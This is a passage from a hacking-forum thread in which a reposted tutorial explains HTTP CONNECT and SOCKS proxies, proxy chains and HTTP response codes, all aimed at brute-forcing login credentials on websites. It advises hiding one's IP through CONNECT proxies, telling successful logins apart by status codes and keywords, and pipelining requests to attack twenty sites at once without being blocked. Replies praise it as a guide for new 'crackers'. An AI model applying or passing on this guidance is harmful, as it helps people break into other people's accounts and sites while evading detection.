5) Now when client sends data, forward it on the connection to that host and port. If the host sends data, forward it to the client on the connection the client made to the proxy server. The proxy does not modify data in any way.


Restricting CONNECT to certain remote ports only
You can restrict at the proxy server, the remote ports that a client is allowed to CONNECT to via the CONNECT command.

Why would you want to do this? For example, lets say you want the proxy to be allowed for HTTPS (email, eCommerce, etc) but not irc or ftp or telnet. Then you'd allow CONNECT to port 443 only (HTTPS).

A common thing to block is P2P too, due to the excess traffic usage. By limiting CONNECT to common ports like 21 (FTP), 23 (telnet), 22 (SSH), 80 (HTTP), 443 (HTTPS), 6667 (IRC), you can allow users to use all the non bandwidth-intensive services they want.


How does CONNECT come into the bruteforcers life?
If you want to bruteforce HTTPS sites with proxies, you need proxies that support CONNECT on port 443. In other words, you need CONNECT-Proxies that support CONNECT to port 443.

CONNECT can also be used to bruteforce HTTP sites. By using a CONNECT to port 80 (if the proxy supports it), you can now proceed with your HTTP request as if you were directly connected to the HTTP server. Also, since the proxy server doesnt touch the data, it cant add HTTP headers - so no leak of your IP, and no way for the remote site to check that you are using a proxy ! (short of manually port scanning the IP of the proxy).

Why doesnt everybody use these proxies for bruteforcing then? Simple. They are rarer. Since they allow a LOT more to be done with them, the admins often disable CONNECT to keep traffic lower and ensure that users dont abuse them for p2p etc (irc at work for e.g.)

Also, most programs dont support them. Most programs dont even support surfing via the CONNECT method. Proxy chains do tend to use them, but many of those use CONNECT to connect to the last proxy, and rather than using CONNECT to connect via the last proxy to the server, they use GET at the last proxy (cant comment on ProxyRama )

Proxy Chains are basically established this way:

0) i = 1
1) Connect to proxy #i
2) Issue a CONNECT command to proxy #i + 1:port of proxy #i + 1
3) Wait for the "Connection established response" from proxy #i
4) Now we have a connection which is as good as a direct one to proxy #i + 1
5) Goto Step 2 until we are at the last proxy, and there are no more proxies to be CONNECT-ed to.


SOCKS proxies

So what are SOCKS proxies?

Well, just as we have Blu-Ray and HD-DVD, we have SOCKS proxies as an alternative to HTTP proxies. In fact, the CONNECT idea was probably stolen from SOCKS.

SOCKS Proxies come in 2 flavors - SOCKS 4 and SOCKS 5. We could talk about SOCKS 4a but its inconsequential given the limited extent of our discussion.

SOCKS 4 proxies support 2 types of Methods - CONNECT and BIND.
SOCKS 5 proxies support 3 types of Methods - CONNECT, BIND, UDP DELEGATE.

The CONNECT methods here are identical the HTTP CONNECT method described above. Except that the format of the command is a little different (will discuss below), and that I have never known a SOCKS proxy server to restrict the ports you can issue a CONNECT to.

The BIND methods are used for something interesting. Let us say you are using IM to send a file to a friend. Problem is, he is firewalled at his ISP, so you cant connect TO his PC. So your IM issues a BIND command, that makes the SOCKS proxy listen on a specific port..e.g. 12718, and sends the Im the port it is listening on, and the IP. The IM now uses the IM protocol to send that port and IP to your friend's IM client. The friend's IM client connects to that IP and port, and receives the file from there.

UDP delegates are similarly used to allow tunnelling of UDP data in some fashion. Thats to allow stuff like streaming video/audio, VoIP (teleph0ny), and gayming

SOCKS 4 proxies have one crucial drawback. They cant resolve hostnames. So you can only give them IP addresses to CONNECT to.

SOCKS suffers from one pain in the er...neck. It uses a *binary* protocol. So rather than sending requests like CONNECT google.com: 80 HTTP/1.0, your request will be weird ASCII characters.

Stuff like :-
Byte 1: 04 for SOCKS 4, 05 for SOCKS 5
Byte 2: 01 for CONNECT, 02 for BIND, 03 for UDP delegate
and so on. Ugly and a pain to code.

For a bruteforcer, a SOCKS proxy and a HTTP CONNECT proxy are roughly equivalent, except for the above mentioned differences.

There are also Wingates which are basically very similar to SOCKS proxies but vary a little.

Since many home users install software like WinGate or ComSocks for their SOCKS proxies, with logging turned off by default (used to be the case), SOCKS and Wingate proxies were often sought after for umm, devious and shady activities

A Couple of Free Bonuses

What do you do if an application of yours doesnt support proxies?

You can use it with a SOCKS or HTTP CONNECT proxy! Just use SocksCap (www.socks.permeo.com) or ProxyCap (google that) to force the connections via the SOCKS or HTTP connect proxy (Proxycap works with both kinds of proxies, SOCKSCap only with SOCKS proxies). In the HTTP CONNECT proxy case, this works only with the TCP protocol...not UDP. But TCP is used by telnet..NNTP (news)..HTTP..HTTPS...IRC...TS (Remote Desktop) .... Kazaa...BitTorrent...DC++...SSH...FTP...blah! Too many to describe. So quite helpful!

What if you have no SOCKS proxy but your app supports only SOCKS proxies?

Simply use a program like
<shameless ad> HE - http://sss.deny.de/he.html </shameless ad>
that converts your app's SOCKS CONNECT requests to HTTP CONNECT requests and sends them to your HTTP CONNECT proxy. There are tons of such programs around, but many of them are needlessly complicated. HE is simple and works quite okay in my experience. I actually wrote it to allow a couple of friends of mine stuck behind a HTTP CONNECT proxy to play Warcraft III on Battle.net They combined it with SocksCap, and did quite okay


Obviously the above works only with CONNECT, not with the BIND and UDP delegate methods.


So the combination of SOCKSCap and HE is quite neat if you have a nosy app that doesnt use proxies. Also with some care, you can use it with a logging proxy and use it to analyse the data sent out by the app - without bothering to go to the extent of packet capturing and reading needlessly overcomplicated dumps.

It also provides you with a nice firewall type setup if you can be bothered to extend HE or find a nice program with monitoring, logging, and filtering capabilities which acts like HE. Firewalls in my opinion are far too passive. This is a slightly more active approach

Oh one more thing. FTP is a weird exception here. It requires the BIND command if SocksCapped, so it cant be ProxyCapped, and it cant be used with HTTP CONNECT proxies unless the app itself supports HTTP CONNECT proxies. Thats because it uses a needlessly proxy unfriendly protocol - one of the oldest protocols around. If you want me to discuss that post a comment

--------------------------------------------------------------------------------

Responses!

Since we aren't ready to discuss shoes and ships and sealing wax, and cabbages and kings, lets look at HTTP Responses

HTTP Response handling is really a matter of looking at two elements
[x] HTTP Response Code and header
[x] HTTP Response Body (HTML)

and using a little logic (easy enough? )

Case Study: Basic Auth Site
How do you handle responses?

Response Codes

Basically the 2xx (200, 206 etc) response codes are pretty much an indication that everythings hunkey-dorey, the site has actually granted you access. You could of course get them if your proxy restricts access to the url being used

The 3xx codes are related to redirections. So essentially we have two options here....this depends on our observation and whats possible under the circumstances
(a) The redirection depends on whether the user/pass tried works
(b) The redirection doesnt depend on whether the user/pass tried works

In case (a), we could probably then not follow the redirection (i.e., not load the new url redirected to) and use the actual url itself as a keyword to detect success/failure depending on which of the two leads to that url.

In case (b), we need to follow that url. If the url isnt basic auth protected, thats sadness, we could then simply post this as a referrer spoof with the popup url as the referrer. If the url is basic auth protected, and is in the same path tree of the original url, then we just try the same user/pass with that url and proceed.

The 4xx codes are HTTP server side error codes. 401 is unauthorized, our user/pass doesnt work (in some setups like IIS, 401 can be used to block based on IP too). 403 is forbidden - some common reasons for this code include the IP of your proxy being blocked from accessing that url, the site blocking ANY IP from accessing that url, The username and password you tried being blocked from accessing that url, etc. Apache provides the .htaccess mechanism to control such access, other web servers provide other mechanisms. Finally, since you can send HTTP responses including headers from server side scripts, its easy to program say a php script that would spew 403 errors or other codes at your fancy.

404 is basically File Not Found. AD abuses the 404 code as a way to describe the *user/pass didnt work* scenario in its form component.... another example of needlessly confusing users. If you had any inclination to work, you'd anyway figure that one out

405 is Method Not Allowed. Again controlled via htaccess in Apache. You can allow users to use GET only some scripts, use only POST on others, etc. You can disable HEAD if you wish. And so on.

407 is a proxy error code (why is a 4xx series code? Don't ask me!). Proxy Authorization required. Obvious


The 5xx codes are proxy / server error codes.

502, 504 are generally timeout related.
503 is an internal server error (sql injection anybody ? ) Web server end



Header fields

Not too many header fields one normally worries about.

One example of a header field we worry about is the "Location" field which holds the new url redirected to on a 3xx response code (redirection).

Another is the Authenticate field, used to tell you the kind of authentication the site uses (apart from basic auth, it could also use NTLM or digest auth for popup). It also tells you the Realm being authenticated for - nothing fancy, just a Sentence/Word describing what you are logging onto e.g. "Britney Spears Style Virgin Fan Club Admin Area".


HTML Responses

Go look up a decent guide on HTML tags.

Just remember one thing. We dont worry about how these responses look in a browser. We worry about the source of the html, i.e. the text of the response. So for keywords, we could use html tags if unique enough. Many people dont seem to have a clue about this aspect of things. Just as they didnt know that WWWHack could only really handle keywords from the titles of pages when used in form mode
--------------------------------------------------------------------------------

Why it matters to read docs!

So I thought Id give you something to chew upon

Currently we have the HEAD method, that is used most often by HTTP basic auth (popup) bruteforce apps, that is pretty fast because it only fetches HTTP headers.

Now obviously we might want to use the GET method because it enables us to use keyword matching. Also HEADs are blocked by some servers (which is why GoldenEye has a radiobutton for you to choose between GET and HEAD - though HEAD is default).

But then using GET means we get a huge amount of data instead of just a compact header. So how do we handle the onerous task of conservation of bandwidth used (since this obviously speeds up the attacK)?

An interesting HTTP header field occurred to me some time back when I was thinking about this issue - the If-Modified-Since field.

Basically on a request, you ask for the full body to be sent to you ONLY If it has been Modified Since the time and date you specify.

http://www.httpsniffer.com/http/1425.htm has a formal definiton.


However, obviously, this can only be applied on static content, not dynamic content. Scripts will just plain ignore it, since it is something processed by the web server, and the web server will see that the script output changes on each execution, and hence can never be already cached on the users side - so need to resend each time to the user.

So it doesnt make any sense to use the url of a script/html file (html can have php embedded in it!) as the url to bruteforce.

You therefore look for static content ....ahh, pictures! Obviously this now requires you to be able to login to the protected section atleast once and look up some jpgs from their default template (thats the one thin that wont change that often).

HTTP/1.1 304 Not Modified
Date: Wed, 26 Jan 2005 06:17:17 GMT
Server: Microsoft-ISS/5.0
Connection: close
ETag: "1be840-d02-413911f0"

The above is an example of such a response based on an If-Modified-Since header in the request. Clearly its saved me having to download a huge jpg all over again.


Interestingly - most people seem to attack urls with HEAD - they can achieve as good results with GET if they attack URLs like those of images within the protected realm. Combination of speed and legitimate requests (GET vs HEAD).


Its a pity this doesnt work with dynamic content. But there are heaps more such little hidden headers and tricks within the HTTP protocol.

For example, pipelining, which allows you to connect to a server, send 20 requests all together, and get the responses one by one. Chunked encoding in the response allows you to separate the responses. MUCH faster than normal connect-wait for response-send another.

But then pipelining + proxies would mean you send multiple requests to a single site from 1 IP, umm, not good. You're going to get blocked.

So we try the innovative and efficient method. Simply attack 20 sites at a
time. Make 20 requests via pipelining through the proxy, just one per site. Fetch the responses, close the connection.

Why is this a lot faster? Because instead of making the connection to a single proxy, sending request, wait for response, disconnect, repeat 20 times, what we do is make the connection ONCE, send 20 requests, wait far less for responses than you'd wait in the previous case, disconnect ONCE, done!

Efficiency and optimization anybody?

Chew on this baby!
_________________
SSS
(version Infinity)
feel free to edit if i have overlooked any spam hehe.
  Reply With Quote

Old 04-01-2005, 06:25 AM   #2
sPlico
The sPlicster
 
sPlico's Avatar
 
sPlico is offline Offline
Join Date: Jan 2005
Location: Croatia
Posts: 9,486
Threads: 407
sPlico is on a distinguished road
Default

This the complete thing? You could name it as how he named it :)

Excelent text.
  Reply With Quote

Old 04-03-2005, 05:17 AM   #3
MoonDoggy
Guest
 
Posts: n/a
Threads: 5107
Default

i'm pretty sure this is all,i just copied the whole page 1 of 1 and then just deleted the endings of each post with the other forums info.
  Reply With Quote

Old 05-03-2005, 02:33 PM   #4
ChIpStIcK
Guest
 
Posts: n/a
Threads: 5107
Default

ultra helpful text
  Reply With Quote

Old 06-13-2005, 09:42 AM   #5
OneKnight
Guest
 
Posts: n/a
Threads: 5107
Default

this is a awesome read ..........EXCELLENT post .. I copied it and saved it for studying ...
  Reply With Quote

Old 12-31-2005, 09:32 PM   #6
overkill
Guest
 
Posts: n/a
Threads: 5107
Default

Great tutorial and thanks for posting it in xisp!

Can't have too many of these laying around, each one seems to provide something special.
  Reply With Quote

Old 08-26-2006, 08:56 AM   #7
chimaira
Guest
 
Posts: n/a
Threads: 5107
Default

sorry because i bring it up! But i thought that it's a very good tutorial for new-cracker, not just for Form@ but also you have more info to know.

Thank to posting in xisp
  Reply With Quote

Old 09-28-2006, 03:19 AM   #8
thchog
Special Friend
 
thchog's Avatar
 
thchog is offline Offline
Join Date: Mar 2006
Location: California, USA
Posts: 319
Threads: 89
thchog is on a distinguished road
Default

One of my all time favorite, if not my favorite, most inspiring, insightful, edumakational read on BF I have encountered up to date, and pressumably ever....
__________________
In times of rapid change, experience could be your worst enemy.
  Reply With Quote
Reply


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump



All times are GMT -4. The time now is 09:49 AM.


vBulletin skin developed by: Xisp.org Crew
Powered by vBulletin®
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd.
2005 Copyright Xisp.org